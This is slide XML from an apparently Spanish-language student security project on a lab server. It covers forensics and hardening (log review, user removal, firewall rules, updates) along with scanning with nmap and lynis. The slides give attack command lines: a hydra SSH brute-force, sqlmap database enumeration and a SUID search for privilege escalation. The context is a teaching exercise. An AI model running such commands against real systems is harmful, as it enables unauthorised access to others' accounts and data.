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BA653-A698-4C7B-9DC6-70E773411816}" v="1" dt="2025-03-18T06:04:1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Izaguirre Casillas" userId="62926253e2e4d7e1" providerId="LiveId" clId="{A14BA653-A698-4C7B-9DC6-70E773411816}"/>
    <pc:docChg chg="custSel modSld">
      <pc:chgData name="Marco Antonio Izaguirre Casillas" userId="62926253e2e4d7e1" providerId="LiveId" clId="{A14BA653-A698-4C7B-9DC6-70E773411816}" dt="2025-03-18T06:04:38.577" v="19" actId="27636"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Marco Antonio Izaguirre Casillas" userId="62926253e2e4d7e1" providerId="LiveId" clId="{A14BA653-A698-4C7B-9DC6-70E773411816}" dt="2025-03-18T06:04:10.588" v="1" actId="27636"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4171405612" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Marco Antonio Izaguirre Casillas" userId="62926253e2e4d7e1" providerId="LiveId" clId="{A14BA653-A698-4C7B-9DC6-70E773411816}" dt="2025-03-18T06:04:10.588" v="1" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4171405612" sldId="256"/>
            <ac:spMk id="3" creationId="{821F736F-7796-1F7A-860A-987FB7713FEC}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Marco Antonio Izaguirre Casillas" userId="62926253e2e4d7e1" providerId="LiveId" clId="{A14BA653-A698-4C7B-9DC6-70E773411816}" dt="2025-03-18T06:04:10.626" v="2" actId="27636"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3513277568" sldId="257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3513277568" sldId="257"/>
            <ac:spMk id="2" creationId="{F886BBFA-A445-0CF8-A4C1-E7022C84C8DC}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Marco Antonio Izaguirre Casillas" userId="62926253e2e4d7e1" providerId="LiveId" clId="{A14BA653-A698-4C7B-9DC6-70E773411816}" dt="2025-03-18T06:04:10.626" v="2" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3513277568" sldId="257"/>
            <ac:spMk id="3" creationId="{1EC8CF8C-0C8E-FC07-52FF-74E99901EDBA}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Marco Antonio Izaguirre Casillas" userId="62926253e2e4d7e1" providerId="LiveId" clId="{A14BA653-A698-4C7B-9DC6-70E773411816}" dt="2025-03-18T06:04:10.631" v="3" actId="27636"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1165836390" sldId="258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1165836390" sldId="258"/>
            <ac:spMk id="2" creationId="{C533BB9C-2E85-B5E6-B961-6ADF22FEA2E1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Marco Antonio Izaguirre Casillas" userId="62926253e2e4d7e1" providerId="LiveId" clId="{A14BA653-A698-4C7B-9DC6-70E773411816}" dt="2025-03-18T06:04:10.631" v="3" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1165836390" sldId="258"/>
            <ac:spMk id="3" creationId="{F72CC85B-AFF7-0058-6E91-DB9D48F5BC3B}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Marco Antonio Izaguirre Casillas" userId="62926253e2e4d7e1" providerId="LiveId" clId="{A14BA653-A698-4C7B-9DC6-70E773411816}" dt="2025-03-18T06:04:10.631" v="4" actId="27636"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3478575145" sldId="259"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Marco Antonio Izaguirre Casillas" userId="62926253e2e4d7e1" providerId="LiveId" clId="{A14BA653-A698-4C7B-9DC6-70E773411816}" dt="2025-03-18T06:04:10.631" v="4" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3478575145" sldId="259"/>
            <ac:spMk id="3" creationId="{A73B81B4-0A66-B2EE-6776-C0E08A7330AD}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Marco Antonio Izaguirre Casillas" userId="62926253e2e4d7e1" providerId="LiveId" clId="{A14BA653-A698-4C7B-9DC6-70E773411816}" dt="2025-03-18T06:04:10.527" v="0"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3774705395" sldId="264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3774705395" sldId="264"/>
            <ac:spMk id="2" creationId="{03CB8DFC-1FE6-0F4A-CAB5-4ECB54CF057C}"/>
          </ac:spMkLst>
        </pc:spChg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3774705395" sldId="264"/>
            <ac:spMk id="3" creationId="{68DED9CD-2DA6-CF05-7EEF-2F33AD74E9BD}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Marco Antonio Izaguirre Casillas" userId="62926253e2e4d7e1" providerId="LiveId" clId="{A14BA653-A698-4C7B-9DC6-70E773411816}" dt="2025-03-18T06:04:38.577" v="19" actId="27636"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1576348243" sldId="265"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Marco Antonio Izaguirre Casillas" userId="62926253e2e4d7e1" providerId="LiveId" clId="{A14BA653-A698-4C7B-9DC6-70E773411816}" dt="2025-03-18T06:04:10.657" v="6" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1576348243" sldId="265"/>
            <ac:spMk id="2" creationId="{C7FA39B0-D658-59EA-C154-EF1307A83BD2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Marco Antonio Izaguirre Casillas" userId="62926253e2e4d7e1" providerId="LiveId" clId="{A14BA653-A698-4C7B-9DC6-70E773411816}" dt="2025-03-18T06:04:38.577" v="19" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1576348243" sldId="265"/>
            <ac:spMk id="3" creationId="{6ED51064-FB1A-CFE9-C292-906636C84C90}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Marco Antonio Izaguirre Casillas" userId="62926253e2e4d7e1" providerId="LiveId" clId="{A14BA653-A698-4C7B-9DC6-70E773411816}" dt="2025-03-18T06:04:10.663" v="7" actId="27636"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4151983604" sldId="266"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Marco Antonio Izaguirre Casillas" userId="62926253e2e4d7e1" providerId="LiveId" clId="{A14BA653-A698-4C7B-9DC6-70E773411816}" dt="2025-03-18T06:04:10.663" v="7" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4151983604" sldId="266"/>
            <ac:spMk id="3" creationId="{CA233718-EABB-0CBF-C20F-8E7AF98A8CD9}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Marco Antonio Izaguirre Casillas" userId="62926253e2e4d7e1" providerId="LiveId" clId="{A14BA653-A698-4C7B-9DC6-70E773411816}" dt="2025-03-18T06:04:10.667" v="8" actId="27636"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2642568248" sldId="268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2642568248" sldId="268"/>
            <ac:spMk id="2" creationId="{D6C15130-7F7F-B9C1-BFCB-CA3B084D9F77}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Marco Antonio Izaguirre Casillas" userId="62926253e2e4d7e1" providerId="LiveId" clId="{A14BA653-A698-4C7B-9DC6-70E773411816}" dt="2025-03-18T06:04:10.667" v="8" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2642568248" sldId="268"/>
            <ac:spMk id="3" creationId="{4247DB27-8CAD-967D-F4C8-AC977525FC97}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Marco Antonio Izaguirre Casillas" userId="62926253e2e4d7e1" providerId="LiveId" clId="{A14BA653-A698-4C7B-9DC6-70E773411816}" dt="2025-03-18T06:04:10.527" v="0"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1630106340" sldId="269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1630106340" sldId="269"/>
            <ac:spMk id="2" creationId="{ADB0A154-F304-F2E9-7A6E-7C5E93876E8E}"/>
          </ac:spMkLst>
        </pc:spChg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1630106340" sldId="269"/>
            <ac:spMk id="3" creationId="{F1701EA2-6841-A91B-3672-9EF41B5A2B04}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Marco Antonio Izaguirre Casillas" userId="62926253e2e4d7e1" providerId="LiveId" clId="{A14BA653-A698-4C7B-9DC6-70E773411816}" dt="2025-03-18T06:04:10.527" v="0"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2657713607" sldId="272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2657713607" sldId="272"/>
            <ac:spMk id="2" creationId="{23EAAA56-B019-FC49-9E97-4BDCE29F2A91}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Marco Antonio Izaguirre Casillas" userId="62926253e2e4d7e1" providerId="LiveId" clId="{A14BA653-A698-4C7B-9DC6-70E773411816}" dt="2025-03-18T06:04:10.682" v="9" actId="27636"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2731449283" sldId="275"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Marco Antonio Izaguirre Casillas" userId="62926253e2e4d7e1" providerId="LiveId" clId="{A14BA653-A698-4C7B-9DC6-70E773411816}" dt="2025-03-18T06:04:10.682" v="9" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2731449283" sldId="275"/>
            <ac:spMk id="3" creationId="{B0ADC664-36C6-7540-E903-F1FAEC2FBD3D}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Marco Antonio Izaguirre Casillas" userId="62926253e2e4d7e1" providerId="LiveId" clId="{A14BA653-A698-4C7B-9DC6-70E773411816}" dt="2025-03-18T06:04:10.527" v="0"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3735967178" sldId="277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3735967178" sldId="277"/>
            <ac:spMk id="2" creationId="{297EC6A7-388A-1FC9-3819-B0F0F9D6E342}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Marco Antonio Izaguirre Casillas" userId="62926253e2e4d7e1" providerId="LiveId" clId="{A14BA653-A698-4C7B-9DC6-70E773411816}" dt="2025-03-18T06:04:10.527" v="0"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1827714091" sldId="278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1827714091" sldId="278"/>
            <ac:spMk id="3" creationId="{C7DD2F20-E9F9-6649-52E9-0A770A75E9B9}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Marco Antonio Izaguirre Casillas" userId="62926253e2e4d7e1" providerId="LiveId" clId="{A14BA653-A698-4C7B-9DC6-70E773411816}" dt="2025-03-18T06:04:10.687" v="10" actId="27636"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3880620683" sldId="279"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Marco Antonio Izaguirre Casillas" userId="62926253e2e4d7e1" providerId="LiveId" clId="{A14BA653-A698-4C7B-9DC6-70E773411816}" dt="2025-03-18T06:04:10.687" v="10" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3880620683" sldId="279"/>
            <ac:spMk id="3" creationId="{3A09328D-2AE2-19EB-2EDB-0A9EACB40622}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Marco Antonio Izaguirre Casillas" userId="62926253e2e4d7e1" providerId="LiveId" clId="{A14BA653-A698-4C7B-9DC6-70E773411816}" dt="2025-03-18T06:04:10.697" v="11" actId="27636"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3483373230" sldId="281"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Marco Antonio Izaguirre Casillas" userId="62926253e2e4d7e1" providerId="LiveId" clId="{A14BA653-A698-4C7B-9DC6-70E773411816}" dt="2025-03-18T06:04:10.697" v="11" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3483373230" sldId="281"/>
            <ac:spMk id="3" creationId="{EE623E22-C021-A9B3-50D1-0B3CD5979BC9}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Marco Antonio Izaguirre Casillas" userId="62926253e2e4d7e1" providerId="LiveId" clId="{A14BA653-A698-4C7B-9DC6-70E773411816}" dt="2025-03-18T06:04:10.697" v="12" actId="27636"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2321282713" sldId="283"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Marco Antonio Izaguirre Casillas" userId="62926253e2e4d7e1" providerId="LiveId" clId="{A14BA653-A698-4C7B-9DC6-70E773411816}" dt="2025-03-18T06:04:10.697" v="12" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2321282713" sldId="283"/>
            <ac:spMk id="3" creationId="{9F1082DA-41DD-5FFD-C2B0-E4C702DD6E2C}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Marco Antonio Izaguirre Casillas" userId="62926253e2e4d7e1" providerId="LiveId" clId="{A14BA653-A698-4C7B-9DC6-70E773411816}" dt="2025-03-18T06:04:10.527" v="0"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2662656485" sldId="287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2662656485" sldId="287"/>
            <ac:spMk id="2" creationId="{73635F4B-4304-68AA-00E2-854DF4BA9915}"/>
          </ac:spMkLst>
        </pc:spChg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2662656485" sldId="287"/>
            <ac:spMk id="3" creationId="{9B6D4ADE-E651-2F6C-F0D0-8ED8C0A965A0}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Marco Antonio Izaguirre Casillas" userId="62926253e2e4d7e1" providerId="LiveId" clId="{A14BA653-A698-4C7B-9DC6-70E773411816}" dt="2025-03-18T06:04:10.707" v="13" actId="27636"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="542486399" sldId="289"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Marco Antonio Izaguirre Casillas" userId="62926253e2e4d7e1" providerId="LiveId" clId="{A14BA653-A698-4C7B-9DC6-70E773411816}" dt="2025-03-18T06:04:10.707" v="13" actId="27636"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="542486399" sldId="289"/>
            <ac:spMk id="3" creationId="{07DB09B9-4E43-31AC-B795-4545F905A151}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Marco Antonio Izaguirre Casillas" userId="62926253e2e4d7e1" providerId="LiveId" clId="{A14BA653-A698-4C7B-9DC6-70E773411816}" dt="2025-03-18T06:04:10.527" v="0"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3934304707" sldId="290"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Marco Antonio Izaguirre Casillas" userId="62926253e2e4d7e1" providerId="LiveId" clId="{A14BA653-A698-4C7B-9DC6-70E773411816}" dt="2025-03-18T06:04:10.527" v="0"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3934304707" sldId="290"/>
            <ac:spMk id="3" creationId="{C8B32E87-A6A6-4661-BE55-D0615840E4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6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6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0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9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3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0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06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6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667D-CBEF-4371-830F-A7CEC6CAF703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2825E5-65FB-45A2-BFA7-97754DDAC3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8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44C4C-AB50-ED16-B79E-2E896BBEF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0205"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-MX" dirty="0"/>
              <a:t>Fases 1, 2 y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F736F-7796-1F7A-860A-987FB7713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sz="4000" b="1" dirty="0"/>
              <a:t>RECONOCIMIENTO Y RECOLECCIÓN DE EVIDENCIAS. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="417140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39B0-D658-59EA-C154-EF1307A8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Revertir los cambios realizados por el ataque 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51064-FB1A-CFE9-C292-906636C8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3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Verificamos los usuarios del sistema y eliminamos aquellos que no deben de estar en el servidor. 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33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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="33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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="33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s-MX" sz="33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s-MX" sz="33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passwd</a:t>
            </a:r>
            <a:endParaRPr lang="es-MX" sz="3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33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userdel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="33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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="33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nombre_usuario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="33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endParaRPr lang="es-MX" sz="3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3300" b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Eliminamos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="3300" b="1" kern="100" dirty="0" err="1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Backdoors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="3300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Identificamos cualquier backdoor que el atacante pueda haber dejado. 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3300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 incluye scripts maliciosos, servicios desconocidos o modificaciones en archivos críticos del sistema.</a:t>
            </a:r>
            <a:endParaRPr lang="es-MX" sz="3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b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634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33718-EABB-0CBF-C20F-8E7AF98A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b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Cerrar puertos innecesarios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Usamos  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" kern="100" dirty="0" err="1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ufw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX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s-MX" kern="100" dirty="0" err="1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iptables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX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cerrar puertos que no sean necesarios, y </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" kern="100" dirty="0" err="1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asegúrando</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX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que el firewall esté configurado adecuadamente:</a:t>
            </a:r>
            <a:endParaRPr lang="es-MX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ufw</a:t>
            </a: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deny</a:t>
            </a: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&lt;puerto&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="es-MX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iptables</a:t>
            </a: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-A INPUT -p </a:t>
            </a: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tcp</a:t>
            </a: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--</a:t>
            </a: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dport</a:t>
            </a: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&lt;puerto&gt; -j DROP</a:t>
            </a:r>
            <a:endParaRPr lang="es-MX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198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3E4646-B542-575D-DDC5-3636E611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911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Actualizar y corregir configuraciones de seguridad.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Actualizamos paquetes y sistemas:</a:t>
            </a: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Asegúrando</a:t>
            </a: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que el sistema esté completamente actualizado, especialmente en lo que respecta a los paquetes de seguridad.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apt-get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="24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4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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="24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&amp;&amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="24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apt-get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="24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4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upgrade</a:t>
            </a:r>
            <a:endParaRPr lang="es-MX" sz="2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Cambiar contraseñas:</a:t>
            </a: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Cambiamos las contraseñas de todos los usuarios, especialmente para las cuentas de administrador y cualquier otra cuenta comprometida.</a:t>
            </a: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2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passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="22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&lt;usuario&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="es-MX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164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15130-7F7F-B9C1-BFCB-CA3B084D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Conclusión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7DB27-8CAD-967D-F4C8-AC977525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MX" sz="32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incidente ha sido mitigado con éxito y las vulnerabilidades utilizadas por el atacante han sido corregidas. Las medidas preventivas implementadas refuerzan la seguridad del servidor y reducirán significativamente la probabilidad de ataques similares en el futuro. Es esencial mantener una vigilancia continua y mejorar las prácticas de seguridad proactivas para proteger los recursos del servidor.</a:t>
            </a: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256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0A154-F304-F2E9-7A6E-7C5E9387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FASE 2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01EA2-6841-A91B-3672-9EF41B5A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esta fase del proyecto se detecto y exploto una vulnerabilidad en la maquina comprometida. El objetivo es utilizar herramientas de escaneo para identificar otros problemas en el sistema. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-MX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010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F8E1056-8461-DFBF-24F5-3BA6F460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84" y="0"/>
            <a:ext cx="98177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Utilizamos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Nmap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</a:t>
            </a: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dsetectar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puertos y servicios abiertos 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3600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln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nmap</a:t>
            </a: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kumimoji="0" lang="es-MX" altLang="es-MX" sz="3600" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln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</a:t>
            </a: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192.168.100.27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encuentran los puertos 21, 22, 80 con las descripciones de los estados de los servicios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ACFD3B07-D670-7A48-0D8F-41C007EF2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5" y="2863384"/>
            <a:ext cx="7373270" cy="386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84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AA82C-0B57-C91B-9E84-F42E0D70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920"/>
            <a:ext cx="10515600" cy="4351338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Utilizamos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX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Lynis</a:t>
            </a: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para una auditoria de seguridad en sistemas basados en Linux. </a:t>
            </a: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 </a:t>
            </a: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lynis</a:t>
            </a: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audit</a:t>
            </a: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endParaRPr lang="es-MX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13793E73-4CA6-F6F8-BC6A-E3B66DB8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1" y="2589589"/>
            <a:ext cx="5612130" cy="3938270"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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66A74F2A-2258-1C0F-3C9C-171629EF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1388"/>
            <a:ext cx="5886825" cy="37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6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AAA56-B019-FC49-9E97-4BDCE29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32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SIMULACION DE UN ATAQUE DE FUERZA BRUTA SOBRE SSH</a:t>
            </a:r>
            <a:b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F8617-488E-5789-0694-E5B790A7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6"/>
            <a:ext cx="10515600" cy="4351338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Utilizamos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="24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hydra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="2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para ver si hay credenciales débiles e intentar corromperlas. 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hydra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="24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-l usuario -P /ruta/a/wordlist.txt ssh://192.168.100.27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1C33A15E-73E5-FD64-D7A5-049493F6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13" y="2832809"/>
            <a:ext cx="9213974" cy="27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1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A1655-EF64-D61D-29B5-9F47FCCF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873" y="285583"/>
            <a:ext cx="10515600" cy="4351338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Escaneo de puertos y servicios expuestos</a:t>
            </a:r>
            <a:endParaRPr lang="es-MX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Utilizamos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="2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nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX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para ver si hay versiones de software que podrían tener </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="2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vulnerabiidades</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX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s-MX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nmap</a:t>
            </a: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lang="es-MX" sz="20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</a:t>
            </a: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-A 192.168.100.27</a:t>
            </a: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endParaRPr lang="es-MX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AB7482C0-8F56-AB70-370D-27A6C89A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31" y="1973829"/>
            <a:ext cx="5196338" cy="36464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088BDE-B003-C0A5-7194-F4215755C96F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3112169" y="5848236"/>
            <a:ext cx="6416841" cy="71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observar los puertos que están vulnerables y los servicios que los están corriendo, así como sus versiones. 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81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217D195-87EE-61AB-36DD-61EC4D4B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22" y="557925"/>
            <a:ext cx="1098884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Inyección SQL en una aplicación WEB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Utilizamos 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sqlmap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para verificar el si servidor comprometido aloja datos vulnerables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sqlmap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-u "http://[IP_DEL_SERVIDOR]/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pagina.php?id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=1" –</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="es-MX" altLang="es-MX" sz="3200" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln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dbs</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="es-MX" altLang="es-MX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F809CB68-8D71-865B-AA6C-720A16B03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48" y="3834067"/>
            <a:ext cx="8213303" cy="23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CD231F7-DB43-7188-5D32-55D3F32E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01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6BBFA-A445-0CF8-A4C1-E7022C84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Corrección de un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" dirty="0" err="1"/>
              <a:t>hakeo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8CF8C-0C8E-FC07-52FF-74E99901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objetivo es realizar un análisis forense de la maquina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hakeada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bloquear el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exploit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mitigar la escalación.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Utilizamos;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grep "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="20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sshd</a:t>
            </a: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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="20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</a:t>
            </a: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/log/auth.log</a:t>
            </a:r>
            <a:endParaRPr lang="es-MX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grep "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="20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failed</a:t>
            </a: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</a:t>
            </a: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/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="20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</a:t>
            </a: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/log/auth.log</a:t>
            </a:r>
            <a:endParaRPr lang="es-MX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grep "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="20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Accepted</a:t>
            </a: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 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="20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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="20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/log/auth.log</a:t>
            </a:r>
            <a:endParaRPr lang="es-MX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 pude mostrar accesos exitosos y fallidos y si los atacantes consiguen acceso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327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DC664-36C6-7540-E903-F1FAEC2F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13346"/>
            <a:ext cx="5257800" cy="5871412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3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Explotación de una vulnerabilidad local en escala de privilegios. </a:t>
            </a:r>
            <a:endParaRPr lang="es-MX" sz="3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3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Acceso como usuario normal , pero con privilegios , parea ver los binarios con permisos. </a:t>
            </a:r>
            <a:endParaRPr lang="es-MX" sz="3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3800" kern="100" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="15608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s-MX" sz="38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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="38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 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="38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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="38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-u=s -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="38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es-MX" sz="38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 2&gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="38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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-MX" sz="38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s-MX" sz="38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</a:t>
            </a:r>
            <a:endParaRPr lang="es-MX" sz="3800" kern="100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="15608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3800" dirty="0"/>
              <a:t>Este comando lista todos los archivos en el sistema que tienen el </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3800" b="1" dirty="0"/>
              <a:t>bit SUID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3800" dirty="0"/>
              <a:t> activo, lo que indica que se ejecutan con los permisos del propietario (normalmente </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3800" dirty="0" err="1"/>
              <a:t>root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="3800" dirty="0"/>
              <a:t>). Esto es importante porque estos archivos pueden representar un riesgo de seguridad si están mal configurados o si un atacante los explota.</a:t>
            </a:r>
            <a:endParaRPr lang="es-MX" sz="3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C3FEBE75-FE80-9167-33BD-5F660BFA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" y="771826"/>
            <a:ext cx="5612130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4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3A0C0-4337-A8A8-F4C4-B7A28E69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06" y="555875"/>
